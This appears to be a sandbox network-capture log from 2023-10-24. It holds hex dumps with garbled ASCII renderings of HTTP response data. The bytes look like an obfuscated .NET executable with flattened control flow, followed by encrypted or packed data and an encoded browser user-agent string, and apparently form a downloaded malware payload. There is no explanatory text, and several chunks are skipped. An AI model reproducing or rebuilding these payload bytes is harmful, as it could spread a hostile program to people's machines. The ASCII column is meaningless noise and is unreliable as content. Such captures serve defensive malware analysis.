                      2023-10-24 07:28:52 UTC39INData Raw: 03 00 00 06 7e 34 00 00 04 28 8d 00 00 0a 28 1b 00 00 06 28 8d 00 00 0a 7e 34 00 00 04 28 8d 00 00 0a 11 6d 7b 3f 00 00 04 17 9a 28 56 00 00 06 28 8d 00 00 0a 11 6d 7b 3f 00 00 04 17 9a 28 57 00 00 06 28 8d 00 00 0a 28 56 00 00 0a 28 43 00 00 06 dd 8b 00 00 00 28 32 00 00 0a fe 1c 07 00 00 01 20 06 5c 00 00 58 fe 1c 20 00 00 01 20 f9 50 00 00 58 20 92 0c 26 07 20 5c f4 d9 f8 d6 d3 69 28 03 00 00 06 7e 34 00 00 04 28 8d 00 00 0a 28 1b 00 00 06 28 8d 00 00 0a 7e 34 00 00 04 28 8d 00 00 0a 7e 27 00 00 0a 8e 20 d0 91 00 00 58 20 fc 38 86 db 20 8f bf 86 db 61 7e 27 00 00 0a 8e 20 99 00 00 00 58 28 03 00 00 06 28 8d 00 00 0a 28 56 00 00 0a 28 43 00 00 06 28 33 00 00 0a de 00 38 2b 4e 00 00 11 9e fe 1c 1f 00 00 01 20 e9 18 01 00 58 20 00 80 03 fd 11 2a 5a 20 3f
                      Data Ascii: ~4(((~4(m{?(V(m{?(W((V(C(2 \X PX & \i(~4(((~4(~' X 8 a~' X(((V(C(38+N X *Z ?
                      2023-10-24 07:28:52 UTC40INData Raw: 28 8d 00 00 0a 11 81 28 8d 00 00 0a 7e 34 00 00 04 28 8d 00 00 0a 11 6d 7b 3f 00 00 04 17 9a 28 8d 00 00 0a 28 dc 00 00 0a 28 56 00 00 0a 28 43 00 00 06 38 81 49 00 00 11 9e 7e 27 00 00 0a 8e 20 b3 aa 00 00 58 7e 27 00 00 0a 8e 20 5e bf 00 00 58 7e 27 00 00 0a 8e 20 ba 00 00 00 58 28 03 00 00 06 16 28 50 00 00 0a 16 33 2d 11 6d 7b 3f 00 00 04 17 9a 16 73 0c 01 00 0a 13 9b 11 9b 11 6d 7b 3f 00 00 04 18 9a 6f fe 00 00 0a 11 9b 6f 0d 01 00 0a 38 20 49 00 00 11 9e 7e 27 00 00 0a 8e 20 dd 06 01 00 58 fe 1c 07 00 00 01 20 66 1b 01 00 58 7e 27 00 00 0a 8e 20 a2 00 00 00 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 07 01 00 00 73 b6 00 00 0a 13 85 11 6d 7b 3f 00 00 04 17 9a 73 0e 01 00 0a 13 6f 11 6f 11 6d 7b 3f 00 00 04 18 9a 28 6a 00 00 0a 11 6d 7b 3f 00 00 04 19
                      Data Ascii: ((~4(m{?(((V(C8I~' X~' ^X~' X((P3-m{?sm{?oo8 I~' X fX~' X((P@sm{?soom{?(jm{?
                      2023-10-24 07:28:52 UTC42INData Raw: 00 00 06 14 20 07 86 29 93 20 36 79 28 93 da 7e 27 00 00 0a 8e 20 ad 1c 01 00 58 fe 1c 07 00 00 01 20 af 00 00 00 58 28 03 00 00 06 17 8d 12 00 00 01 13 99 11 99 16 11 6d 7b 3f 00 00 04 13 23 11 23 18 13 1a 11 1a 9a a2 11 99 13 40 11 40 14 14 17 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 28 92 00 00 0a 26 11 3e 16 90 2c 22 11 23 11 1a 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 38 cc 43 00 00 11 9e 11 64 1f 58 11 64 5a 1f 28 11 64 5a 58 65 60 20 96 1c 00 00 11 64 60 61 1f 40 5f 16 33 02 2b 0c 21 40 5b 8d 74 00 00 00 00 b7 2b 0c fe 1c 43 00 00 01 20 2f 1a 00 00 58 00 7e 27 00 00 0a 8e 20 1e 0a 00 00 58 11 80 18 5c 20 c7 da ff ff 61 16 33 02 2b 0e fe 1c 20 00 00 01 20 d9 00 00 00 58 2b 0a 23 00 00 00 68 90 d7
                      Data Ascii: ) 6y(~' X X(m{?##@@;>>>(&>,"#@(!($(t8CdXdZ(dZXe` d`a@_3+!@[t+C /X~' X\ a3+ X+#h
                      2023-10-24 07:28:52 UTC43INData Raw: 1c 07 00 00 01 20 d4 fd 00 00 58 7e 27 00 00 0a 8e 20 f1 00 00 00 58 28 03 00 00 06 15 16 28 8b 00 00 0a 13 63 16 13 a3 38 91 00 00 00 11 63 11 a3 9a 13 4c 11 4c 28 56 00 00 0a 28 81 00 00 0a 2c 26 11 4c 28 56 00 00 0a 11 6d 7b 3f 00 00 04 18 9a 11 4c 28 56 00 00 0a 28 4f 00 00 0a 28 42 00 00 0a 28 9c 00 00 0a 11 4c 28 56 00 00 0a 28 1b 01 00 0a 2c 31 28 0b 00 00 06 6f 08 01 00 0a 11 4c 28 56 00 00 0a 11 6d 7b 3f 00 00 04 18 9a 11 4c 28 56 00 00 0a 28 4f 00 00 0a 28 42 00 00 0a 17 6f 1c 01 00 0a de 0f 25 28 32 00 00 0a 13 04 28 33 00 00 0a de 00 11 a3 17 d6 13 a3 11 a3 11 63 8e b7 3f 64 ff ff ff 38 39 3e 00 00 11 9e fe 1c 4f 00 00 01 20 2f 13 01 00 58 20 c9 76 80 4d 20 6d 8b 80 b2 d6 7e 27 00 00 0a 8e 1f 11 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 ba 01
                      Data Ascii: X~' X((c8cLL(V(,&L(Vm{?L(V(O(B(L(V(,1(oL(Vm{?L(V(O(Bo%(2(3c?d89>O /X vM m~'X((P@
                      2023-10-24 07:28:52 UTC44INData Raw: 0a 8e 20 b4 d1 00 00 58 00 7e 27 00 00 0a 8e 1f 6a 58 28 03 00 00 06 16 28 50 00 00 0a 16 33 2c 28 0b 00 00 06 6f 1f 01 00 0a 6f 20 01 00 0a 28 0b 00 00 06 6f 1f 01 00 0a 11 6d 7b 3f 00 00 04 17 9a 6f 21 01 00 0a 38 62 39 00 00 11 9e 7e 0d 00 00 04 13 11 11 11 20 00 00 00 14 5a 1f 13 64 66 7e 08 00 00 04 13 49 11 49 1b 62 2e 02 2b 0e 7e 27 00 00 0a 8e 20 39 0c f3 a9 58 2b 2f 11 9a 1f 20 5e 1f 10 5c 17 5f 17 11 9a 1a 64 5f 33 02 2b 0e fe 1c 28 00 00 01 20 6e b2 c9 da 58 2b 0c 7e 27 00 00 0a 8e 20 8a 46 00 00 58 00 00 18 11 07 5a 20 1a 18 00 00 58 11 07 1f 3e 5a 58 1c 64 20 b6 21 00 00 59 11 07 2e 02 2b 2f 20 00 00 00 92 11 45 5a 20 63 0a 00 00 5f 16 33 02 2b 0d 20 1f 4e 65 71 20 81 f3 38 03 d6 2b 0c fe 1c 07 00 00 01 20 d6 b9 cb 95 58 00 2b 0c fe 1c 20 00
                      Data Ascii: X~'jX((P3,(oo (om{?o!8b9~ Zdf~IIb.+~' 9X+/ ^\_d_3+( nX+~' FXZ X>ZXd !Y.+/ EZ c_3+ Neq 8+ X+
                      2023-10-24 07:28:52 UTC46INData Raw: 33 00 00 0a de 00 7e 37 00 00 04 2d 30 7e 27 00 00 0a 8e 20 cf 5e 00 00 58 7e 27 00 00 0a 8e 20 29 79 00 00 58 fe 1c 1f 00 00 01 1f 32 58 28 03 00 00 06 28 43 00 00 06 dd 29 34 00 00 7e 37 00 00 04 28 18 01 00 0a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 73 f8 00 00 58 20 76 24 00 00 11 77 18 5a 11 77 18 5a 58 61 16 33 02 2b 0e fe 1c 2e 00 00 01 20 24 ef 00 00 58 2b 25 7e 0d 00 00 04 13 46 11 46 1f 20 5c 16 32 02 2b 0e 7e 27 00 00 0a 8e 20 0e ea d2 3f 58 2b 05 20 c9 a2 33 a5 00 00 20 da 00 00 00 28 03 00 00 06 1b 8d 12 00 00 01 13 99 11 99 16 7e 1c 00 00 04 a2 11 99 17 7e 1d 00 00 04 a2 11 99 18 7e 1f 00 00 04 a2 11 99 19 7e 1e 00 00 04 a2 11 99 1a 28 1b 00 00 06 a2 11 99 13 40 11 40 14 14 1b 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 17 9c 11 3e 18 17 9c
                      Data Ascii: 3~7-0~' ^X~' )yX2X((C)4~7((~' sX v$wZwZXa3+. $X+%~FF \2+~' ?X+ 3 (~~~~(@@;>>>>
                      2023-10-24 07:28:52 UTC47INData Raw: 2b 0c 7e 27 00 00 0a 8e 20 82 33 b2 92 58 00 00 00 2b 0c 7e 27 00 00 0a 8e 20 27 00 90 76 58 00 7e 27 00 00 0a 8e 20 e2 00 00 00 58 28 03 00 00 06 28 43 00 00 06 dd d2 2e 00 00 7e 39 00 00 04 28 18 01 00 0a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 8e bc 00 00 58 fe 1c 43 00 00 01 20 a7 aa 00 00 58 7e 27 00 00 0a 8e 1f 2a 58 28 03 00 00 06 1b 8d 12 00 00 01 13 99 11 99 16 7e 1c 00 00 04 a2 11 99 17 7e 1d 00 00 04 a2 11 99 18 7e 1f 00 00 04 a2 11 99 19 7e 1e 00 00 04 a2 11 99 1a 28 1b 00 00 06 a2 11 99 13 40 11 40 14 14 1b 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 17 9c 11 3e 18 17 9c 11 3e 19 17 9c 11 3e 1a 16 9c 11 3e 17 28 92 00 00 0a 26 11 3e 16 90 2c 22 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 80 1c 00 00
                      Data Ascii: +~' 3X+~' 'vX~' X((C.~9((~' XC X~'*X(~~~~(@@;>>>>>>>(&>,"@(!($(t
                      2023-10-24 07:28:52 UTC48INData Raw: 1c 43 00 00 01 20 e2 fe 00 00 58 16 13 5f 11 5f 28 03 00 00 06 16 28 50 00 00 0a 16 33 42 7e 3c 00 00 04 6f 75 00 00 0a de 0f 25 28 32 00 00 0a 13 17 28 33 00 00 0a de 00 11 6d 25 fe 07 61 00 00 06 73 63 00 00 0a 73 64 00 00 0a 80 3c 00 00 04 7e 3c 00 00 04 6f 65 00 00 0a 38 43 29 00 00 11 9e 23 00 00 00 00 40 11 e9 40 69 7e 27 00 00 0a 8e 20 d1 d3 00 00 58 20 54 12 00 00 11 4b 1f 1a 62 61 1f 15 62 66 11 4b 1f 1d 5c 2e 02 2b 2c 20 c7 da ff ff 11 09 18 5c 61 16 2e 02 2b 0e 7e 27 00 00 0a 8e 20 a8 7a ae b2 58 2b 0c fe 1c 2e 00 00 01 20 db b9 c9 76 58 00 2b 08 7e 27 00 00 0a 8e 19 58 00 28 03 00 00 06 16 28 50 00 00 0a 16 33 20 7e 3c 00 00 04 6f 75 00 00 0a de 0f 25 28 32 00 00 0a 13 9c 28 33 00 00 0a de 00 38 b0 28 00 00 11 9e 7e 27 00 00 0a 8e 20 35 da 00
                      Data Ascii: C X__((P3B~<ou%(2(3m%ascsd<~<oe8C)#@@i~' X TKbabfK\.+, \a.+~' zX+. vX+~'X((P3 ~<ou%(2(38(~' 5
                      2023-10-24 07:28:52 UTC50INData Raw: 2b 0e 21 b7 35 00 00 00 00 00 00 69 13 1d 11 1d 00 00 2b 0b 20 3b 7e 55 79 20 d5 97 ed fc 61 00 fe 1c 3c 00 00 01 1f 1f 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 a8 01 00 00 11 13 20 80 d2 04 00 5a 1f 48 59 20 40 4d 03 00 59 11 13 20 00 c7 21 00 5a 33 05 38 12 01 00 00 7e 0c 00 00 04 13 90 11 90 20 d5 e1 ff ff 5f 11 90 1f 19 5c 5f 1d 62 66 20 00 00 00 84 11 90 5a 33 02 2b 0a 20 8a 50 00 00 38 e1 00 00 00 20 f0 21 00 00 20 c0 00 00 00 11 8f 5a 1f 40 11 8f 5a 58 65 61 16 2e 02 2b 37 11 9a 20 00 a0 15 02 5a 20 f4 11 00 00 58 20 c4 e7 ff ff 2e 02 2b 0e 7e 27 00 00 0a 8e 20 5e d1 6d c4 58 2b 0c fe 1c 28 00 00 01 20 1b 92 54 92 58 00 38 8f 00 00 00 20 80 00 00 00 7e 0b 00 00 04 13 a6 11 a6 1d 62 20 56 06 00 00 11 a6 5f 11 a6 20 80 ed f6 ff 5a 59 61 5f 16 2e 02
                      Data Ascii: +!5i+ ;~Uy a<X((P@ ZHY @MY !Z38~ _\_bf Z3+ P8 ! Z@ZXea.+7 Z X .+~' ^mX+( TX8 ~b V_ ZYa_.
                      2023-10-24 07:28:52 UTC51INData Raw: 2b 0a 23 00 00 00 00 c0 88 d1 40 b7 00 20 db 5f 3a f7 20 13 f3 c5 08 d6 20 49 01 00 00 11 1f 5a 20 b7 06 00 00 11 1f 5a 58 1f 52 5c 20 b6 e2 03 59 33 02 2b 0e 7e 27 00 00 0a 8e 20 d2 00 00 00 58 2b 36 20 ff ff 7f 00 11 67 20 c7 42 0a 00 5c 20 63 4b 51 00 5e 60 20 ff ff 7f 00 33 02 2b 0c 21 a1 7f af 7a 00 00 00 00 b7 2b 0c fe 1c 3c 00 00 01 20 d3 b0 97 85 58 00 00 28 03 00 00 06 16 28 50 00 00 0a 16 40 db 01 00 00 11 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 da 57 00 00 58 20 da 0e 00 00 11 a1 20 7f b5 72 1b 5c 61 16 2e 02 2b 0e fe 1c 3c 00 00 01 20 0d 23 ef ab 58 2b 31 20 cf 04 00 00 11 13 20 2a ea 61 1e 5c 60 20 cf 04 00 00 2e 02 2b 0d 20 90 db 03 a5 20 b4 9e 03 a5 61 2b 0c fe 1c 07 00 00 01 20 d9 13 5a 8b 58 00 00 11 48 20 00 10 00
                      Data Ascii: +#@ _: IZ ZXR\ Y3+~' X+6 g B\ cKQ^` 3+!z+< X((P@m{?(~' WX r\a.+< #X+1 *a\` .+ a+ ZXH
                      2023-10-24 07:28:52 UTC52INData Raw: 58 60 1f fe 2e 02 2b 0b 7e 27 00 00 0a 8e 1f 10 58 2b 0c 7e 27 00 00 0a 8e 20 b8 98 3a 3f 58 00 00 28 03 00 00 06 16 28 50 00 00 0a 16 40 24 01 00 00 11 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 f2 14 00 00 58 7e 27 00 00 0a 8e 20 8e 0d 00 00 58 7e 27 00 00 0a 8e 20 c1 00 00 00 58 28 03 00 00 06 19 8d 12 00 00 01 13 99 11 99 16 11 6d 7b 3f 00 00 04 13 23 11 23 18 13 1a 11 1a 9a a2 11 99 17 11 6d 7b 3f 00 00 04 13 08 11 08 19 13 43 11 43 9a a2 11 99 18 11 6d 7b 3f 00 00 04 13 4a 11 4a 1a 13 0c 11 0c 9a a2 11 99 13 40 11 40 14 14 19 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 17 9c 11 3e 18 17 9c 11 3e 17 28 92 00 00 0a 26 11 3e 16 90 2c 22 11 23 11 1a 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00
                      Data Ascii: X`.+~'X+~' :?X((P@$m{?(~' X~' X~' X(m{?##m{?CCm{?JJ@@;>>>>>(&>,"#@(!($(t
                      2023-10-24 07:28:52 UTC54INData Raw: 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 11 3e 17 90 2c 22 11 4a 11 0c 11 40 17 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 38 f4 13 00 00 11 9e 7e 27 00 00 0a 8e 20 87 62 00 00 58 20 00 17 00 00 18 7e 0b 00 00 04 13 25 11 25 5a 1c 11 25 5a 58 11 25 20 00 40 3f 4e 5f 59 5f 11 25 19 62 20 00 17 00 00 5f 33 02 2b 0e 7e 27 00 00 0a 8e 20 78 73 a7 ad 58 2b 0c fe 1c 4f 00 00 01 20 ae 80 00 00 58 00 1f 3c 28 03 00 00 06 16 28 50 00 00 0a 16 33 4a 23 00 00 00 00 40 a4 d9 40 b7 7e 27 00 00 0a 8e 20 85 74 00 00 58 7e 27 00 00 0a 8e 20 b5 00 00 00 58 28 03 00 00 06 7e 34 00 00 04 28 dc 00 00 0a 28 1b 00 00 06 28 dc 00 00 0a 28 56 00 00 0a 28 43 00 00 06 38 44 13 00 00 11 9e 20 c2
                      Data Ascii: @(!($(t>,"J@(!($(t8~' bX ~%%Z%ZX% @?N_Y_%b _3+~' xsX+O X<((P3J#@@~' tX~' X(~4((((V(C8D
                      2023-10-24 07:28:52 UTC58INData Raw: 01 20 c3 0e 01 00 58 2b 0c fe 1c 28 00 00 01 20 45 9c 61 9e 58 00 1f 55 28 03 00 00 06 7e 34 00 00 04 28 dc 00 00 0a 28 1b 00 00 06 28 dc 00 00 0a 28 56 00 00 0a 28 43 00 00 06 38 7a 03 00 00 11 9e 21 f0 aa 00 00 00 00 00 00 b7 11 54 20 70 48 00 00 5a 19 5f 16 33 02 2b 34 11 9f 20 ff 23 00 00 60 20 21 26 00 00 59 20 aa 03 cd 6a 33 02 2b 0e 7e 27 00 00 0a 8e 20 65 d8 a3 67 58 2b 0c fe 1c 3c 00 00 01 20 36 10 fb cb 58 00 2b 0c 7e 27 00 00 0a 8e 20 8e b3 00 00 58 00 7e 27 00 00 0a 8e 20 95 00 00 00 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 60 01 00 00 11 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 fe 1c 4f 00 00 01 20 54 7a 00 00 58 7e 27 00 00 0a 8e 20 05 65 00 00 58 11 27 1f 09 62 20 df e4 ff ff 2e 02 2b 10 23 00 00 00 cf 46 60 b8 c1 b7 13 8c 11 8c 2b 09 7e
                      Data Ascii: X+( EaXU(~4((((V(C8z!T pHZ_3+4 #` !&Y j3+~' egX+< 6X+~' X~' X((P@`m{?(O TzX~' eX'b .+#F`+~
                      2023-10-24 07:28:52 UTC62INData Raw: 00 00 00 09 00 00 11 16 0a 00 06 2a 00 00 00 1e 02 28 1f 00 00 0a 2a 03 30 08 00 ed 00 00 00 0a 00 00 11 02 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 1c 89 00 00 58 17 7e 10 00 00 04 0a 06 65 5f 20 50 15 00 00 06 58 17 5f 33 02 2b 0e fe 1c 28 00 00 01 20 6e 3a bf be 58 2b 6c 20 2e e4 ff 0f 06 1f 1c 62 5f 16 33 02 2b 50 06 1f 09 62 1f 98 2e 02 2b 37 06 20 ce e3 07 00 5c 06 20 00 00 80 00 5a 59 20 56 8f 00 00 61 16 33 02 2b 0e 7e 27 00 00 0a 8e 20 70 f9 29 4d 58 2b 0c fe 1c 4f 00 00 01 20 67 e0 ea 38 58 00 2b 0c 7e 27 00 00 0a 8e 20 e6 bf bd dd 58 00 2b 0c 7e 27 00 00 0a 8e 20 5a 8d 00 00 58 00 00 20 76 23 00 00 06 58 17 5f 06 17 5f 33 02 2b 0e 7e 27 00 00 0a 8e 20 69 88 36 79 58 2b 0c 7e 27 00 00 0a 8e 20 9a 00 00 00 58 00 28 03 00 00 06
                      Data Ascii: *(*0{?(~' X~e_ PX_3+( n:X+l .b_3+Pb.+7 \ ZY Va3+~' p)MX+O g8X+~' X+~' ZX v#X__3+~' i6yX+~' X(
                      2023-10-24 07:28:52 UTC66INData Raw: 1c c1 93 dd c8 90 8c 65 fc 6b 6f 84 2d 7d 2e 6a f2 1c e2 6f 1e 86 f2 d4 dd 31 03 32 84 2d 7d 30 6a f2 1c 18 d4 75 a1 59 90 ce 09 db de 84 2d 7d 30 6a f2 1c 5b 71 aa f8 cf bf 00 96 8d be 84 2d 7d 2d 6a f2 1c e3 82 40 40 89 de 50 7d 16 86 84 2d 7d 2f 6a f2 1c 41 54 85 dc 49 15 75 0a cc 40 85 2d 7d 30 6a f2 1c 64 9a a7 d1 d1 92 59 7a b8 54 85 2d 7d 30 6a f2 1c 9b dc d4 fe 9a 6d cb 35 bd 17 85 2d 7d 31 6a f2 1c 5c c0 06 40 70 c1 2b 61 90 c4 85 2d 7d 31 6a f2 1c 66 93 8a 33 c9 2c dc 9c 14 6f 86 2d 7d 2b 6a f2 1c 66 d3 b2 f5 2b 1a a9 9d 0a 20 86 2d 7d 29 6a f2 1c 8a 3b 8d 90 92 93 29 a3 5b e9 86 2d 7d 29 6a f2 1c e3 78 36 69 3b 78 e1 96 bf a3 86 2d 7d 29 6a f2 1c 51 b8 79 43 d3 40 88 51 cf 4b 87 2d 7d 29 6a f2 1c a4 ad bb ba 4e c3 ab f9 d2 ea 87 2d 7d 2f 6a f2
                      Data Ascii: eko-}.jo12-}0juY-}0j[q-}-j@@P}-}/jATIu@-}0jdYzT-}0jm5-}1j\@p+a-}1jf3,o-}+jf+ -})j;)[-})jx6i;x-})jQyC@QK-})jN-}/j
                      2023-10-24 07:28:52 UTC68INData Raw: 59 45 c0 76 8e a8 2d 7d 2d 6a f2 1c 1e 7d fd 94 59 5c ee 46 b7 53 a9 2d 7d 2f 6a f2 1c b7 3a 8e 92 e7 f5 c8 f2 34 30 a9 2d 7d 2f 6a f2 1c 62 fd 53 54 02 75 dc d3 b0 37 a9 2d 7d 2e 6a f2 1c f2 ed 66 ca 36 87 34 a1 24 e5 a9 2d 7d 31 6a f2 1c 89 60 b1 e8 b5 c5 b1 bf 37 f2 a9 2d 7d 2f 6a f2 1c 71 2b 3d 8d 2c 75 1e b2 dd a3 a9 2d 7d 39 6a f2 1c 67 f2 37 d3 3c 28 b4 0b ff 7d aa 2d 7d 32 6a f2 1c 1f a6 73 cf 5d eb 92 35 d7 5c aa 2d 7d 34 6a f2 1c 84 31 d6 64 35 03 88 81 2c 23 aa 2d 7d 2c 6a f2 1c b3 e0 47 97 0a 07 a4 9e 64 f6 aa 2d 7d 14 6a f2 1c 0d 23 6b 26 e9 a2 ea 4d 31 7c ab 2d 7d 34 6a f2 1c 0a 06 82 74 7a 2a 31 c5 d1 76 ab 2d 7d 31 6a f2 1c 56 eb d6 3b c9 3d 5d 49 d8 10 ab 2d 7d 44 6a f2 1c 2e d6 cd 32 93 f9 39 60 18 fc ab 2d 7d 44 6a f2 1c 14 53 22 ad 40
                      Data Ascii: YEv-}-j}Y\FS-}/j:40-}/jbSTu7-}.jf64$-}1j`7-}/jq+=,u-}9jg7<(}-}2js]5\-}4j1d5,#-},jGd-}j#k&M1|-}4jtz*1v-}1jV;=]I-}Dj.29`-}DjS"@
                      2023-10-24 07:28:52 UTC72INData Raw: 95 33 80 0a 31 b8 f6 6e 56 d4 74 e4 c2 f2 7a 6e be 22 a3 ee e0 f0 6f ba 34 36 63 bf d1 3f cf a1 54 e0 18 2c fa c8 1f da c0 1e d1 57 08 6a 8f 65 d3 d9 9c 66 8a 92 09 a5 c3 c5 d6 fb 54 37 9d 16 04 d2 90 e1 da 4e 73 f6 02 c9 2d c1 1f 18 b2 c9 a6 fe eb f7 a3 68 17 c1 d6 72 68 34 f2 24 85 89 81 ba 53 35 d9 ae 8a 85 65 a5 63 c0 64 47 86 ab 13 0c 54 55 4c a5 73 9b bb ce 0a 67 e6 3e 03 de 44 a4 40 64 c5 7c ef f8 74 65 91 fd 04 56 5d 8f ec bc 21 e5 d0 2f 3c db 47 b7 7a 0a a3 22 9f 26 a1 85 7c c0 07 21 e6 97 1c 5b e1 e6 13 75 96 65 71 7b 7b 29 1d 1e 0e 15 67 65 1d 0d 01 e4 55 51 c6 6b 5c 7f d9 9c 87 cb d6 89 c9 74 4d 56 c7 d2 20 15 99 28 a7 75 09 83 77 67 59 a2 04 d8 95 37 06 8f 1f a8 19 17 8b d5 f3 b0 52 93 55 99 c7 10 9d 4a ec ec 4b 2d aa 50 62 d8 07 72 42 e5 c6
                      Data Ascii: 31nVtzn"o46c?T,WjefT7Ns-hrh4$S5ecdGTULsg>D@d|teV]!/<Gz"&|![ueq{{)geUQk\tMV (uwgY7RUJK-PbrB
                      2023-10-24 07:28:52 UTC76INData Raw: c6 de da 89 e7 fd 89 9f 87 98 92 89 fe c0 c7 9f 9d 92 89 d1 9f 9d 92 89 db df 93 9f 9f 87 99 80 89 ee cc ca c2 c6 86 9b 99 98 99 99 98 99 98 89 ef c0 db cc cf c6 d1 86 9f 9f 87 99 9e 5e 47 bd 4c 93 57 90 12 da 80 92 96 0f f5 c2 0d 7f ac b0 8b 04 fd f1 30 16 3d 9b c7 84 1a 68 47 01 bd fa 96 34 4f e9 02 e8 a8 0d 6d a1 ff 24 35 11 e4 53 6b 5c 20 9a 60 56 8d 36 55 bb c9 46 64 71 62 67 67 6a 24 3e 25 3b 2b 23 62 5b 63 64 65 6e 30 2b 48 5b 5e 2b 62 5b 63 64 65 6e 2b 44 58 2b 3a 3a 54 3f 54 3a 2b 67 62 60 6e 2b 46 6a 68 2b 44 58 2b 53 22 2b 4a 7b 7b 67 6e 5c 6e 69 40 62 7f 24 3d 3b 3e 25 3a 25 3a 3e 2b 23 40 43 5f 46 47 27 2b 67 62 60 6e 2b 4c 6e 68 60 64 22 2b 5d 6e 79 78 62 64 65 24 3a 3a 25 3b 2b 46 64 69 62 67 6e 24 3a 3e 4e 3a 3f 33 2b 58 6a 6d 6a 79 62 24
                      Data Ascii: ^GLW0=hG4Om$5Sk\ `V6UFdqbggj$>%;+#b[cden0+H[^+b[cden+DX+::T?T:+gb`n+Fjh+DX+S"+J{{gn\ni@b$=;>%:%:>+#@C_FG'+gb`n+Lnh`d"+]nyxbde$::%;+Fdibgn$:>N:?3+Xjmjyb$
                      2023-10-24 07:28:52 UTC81INData Raw: 36 6e 41 33 47 f9 84 6d da 21 8a 20 a4 12 bd d1 e0 8b 81 eb 46 58 9b d5 fc 4a b1 71 4a 98 b2 3a 67 b4 c1 df 16 6a f5 be cc 9f 7d 7a 35 02 02 1f 02 4a 50 48 e3 f9 23 f5 26 f3 b3 25 e4 00 98 9d 9b 98 44 e9 95 be 22 42 6f 50 b9 a1 a6 51 de bb 75 96 c3 1e a6 b2 53 f2 03 26 bb 4a 57 e5 8c 55 67 1c 23 44 7d 26 0b 28 0e 7c 64 33 34 92 40 33 a4 48 38 3d 8f 21 e1 f1 eb 47 a6 40 c2 da 73 cb 5c e3 fb 52 d3 2e 99 3d 4f 8a 9a 10 29 4e 7a 5f c3 f3 16 02 1f a7 fc 33 85 2a 37 fc d7 e5 48 4e 9b b1 07 f5 97 ee 5f 76 ae fa ee 05 87 d1 c8 9c cd 46 7d cf c3 70 ac b4 e6 c7 cc a9 f6 9d e3 f4 f2 69 41 4c 75 77 47 85 c8 d5 94 a0 54 24 b9 f7 ac b4 61 9a 2f 90 68 79 8a 2a 05 52 0e cf 21 b5 7f 11 95 84 c3 3a 5c 50 55 48 7e a8 3b 22 1c 87 fb ef 1a 18 47 5b 6e d5 01 c8 c1 4a 72 f5 76
                      Data Ascii: 6nA3Gm! FXJqJ:gj}z5JPH#&%D"BoPQuS&JWUg#D}&(|d34@3H8=!G@s\R.=O)Nz_3*7HN_vF}piALuwGT$a/hy*R!:\PUH~;"G[nJrv
                      2023-10-24 07:28:52 UTC85INData Raw: aa 52 cf 09 30 5b dd ff 62 eb f8 69 4f 3e 05 64 ae 67 5f cd 94 86 f7 a6 09 a2 2a 3b 1c 7b 38 1f 07 94 cc fb e6 09 85 2e 1b 34 1a 17 02 a0 85 bf b9 0b 8c df 10 6b b3 55 24 5a 29 ff 8e 31 a2 e3 e6 b2 d8 61 bb 71 0a 7d a4 e1 30 96 7a 6e f4 05 84 e2 70 30 8f 9c 28 b4 54 3e 63 62 65 a0 bd 09 f7 fd 94 37 31 50 c7 23 04 48 00 0e b0 b1 b1 2e 3a 1c da b5 65 23 7b ac c0 71 53 49 8a 24 0c 7c c9 69 c0 9a ea 33 02 43 3d a4 3d 61 dd 28 2f 80 61 f9 7a 38 63 f2 3b 99 8e 4a 3d 22 e3 e7 c5 a3 16 88 7e 97 4e a0 43 07 19 97 78 c1 e5 1a ce 97 42 d2 e8 91 a9 d4 18 d7 2e 26 0b a0 f5 df 60 55 df 99 4a 55 aa 98 32 69 68 68 b5 72 1e cc 7a 79 b3 74 7c a5 e0 10 ff 33 f9 41 6f a6 5f 29 27 94 a3 11 3a 36 22 e1 4c cf 78 ed a9 a0 26 dc 37 b6 4b 5d b4 73 97 23 50 ff 4f 56 ab 9f 08 e6 03
                      Data Ascii: R0[biO>dg_*;{8.4kU$Z)1aq}0znp0(T>cbe71P#H.:e#{qSI$|i3C==a(/az8c;J="~NCxB.&`UJU2ihhrzyt|3Ao_)':6"Lx&7K]s#POV
                      2023-10-24 07:28:52 UTC89INData Raw: 21 4e 67 69 5e e6 a1 d7 14 e6 79 8b 8a dd 26 db d2 f4 ef 3a bb bb 62 89 f0 bc 6a b7 9f c3 29 15 66 9e 0c 57 ef 84 b3 43 c5 a7 f2 ee f6 b5 8d 99 98 55 5f 24 dc bc a3 66 eb de 78 a2 7b e9 37 50 bd 63 24 ec d1 cf ec 4e 40 ac 74 13 c8 74 92 3b 2e d0 1e 4a 64 04 39 aa 69 65 64 a6 6b 10 0c 11 c7 db 70 a2 30 93 91 a1 c8 c8 69 11 e4 30 47 8f 9e 77 4b 3d 74 ab ca ec eb b8 2a 7a f1 2b 64 db 42 2e e5 99 a3 25 43 ff aa 8c 07 56 e1 53 20 08 62 6b 07 f3 c5 ce 9d 1b 10 83 b6 78 69 17 b0 9d 64 8e cf b5 4a ae ec 78 34 4b 92 e7 a3 74 0b 98 98 21 17 85 23 53 6c 6a 6d 5f 6c 77 15 73 91 c9 88 1f 6f cb 96 93 dc 6a f1 53 83 6a be b4 7e 8f bf 79 3c b5 78 9c 78 1d df 47 00 2a 7a f4 78 5c 24 81 26 cd 09 